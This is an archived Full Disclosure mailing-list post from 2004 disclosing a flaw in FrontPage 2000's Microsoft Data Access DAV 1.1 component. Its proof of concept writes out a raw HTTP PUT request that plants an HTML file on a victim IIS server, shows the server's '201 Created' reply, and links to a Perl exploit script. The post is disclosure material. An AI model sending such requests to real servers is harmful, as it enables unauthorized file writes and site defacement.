Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Microsoft Data Access Dav1.1 PoC

Microsoft Data Access Dav1.1 PoC

From: CorryL <corryl_at_sitoverde.com>
Date: Fri, 31 Dec 2004 08:53:24 +0100

Microsoft DATA Access Internet Publishing Service Provider DAV 1.1 component
of frontpage2000 is vulnerable to a special request of PUT a remote attacker
using this bug succeeds to write some
code html to the inside of the server victim

Proof Of Concept:
The remote attacker using the special request of PUT
write the html page in the Victim Server.

PUT /file.htm HTTP/1.0 Accept-Language: en-us;q=0.5 Translate: f
Content-Length:17 User-Agent: Microsoft Data Access Internet Publishing
Provider DAV 1.1 Host: www.hotst-victim.com Html Code

Response to the Server:

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 30 Dec 2004 22:29:36 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: http://192.168.0.3/vulne.htm
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH,
SEARCH, LOCK, UNLOCK

The exploit download from http://hosting.xoned.org/upload/DAV1.1-PoC.pl

Happy New Year By x0n3-h4ck

For info:
CorryL
corryl80_at_gmail.com
www.x0n3-h4ck.tk Italian Security Team

_________________________________
www.seekstat.it is your web stat
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Jan 03 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]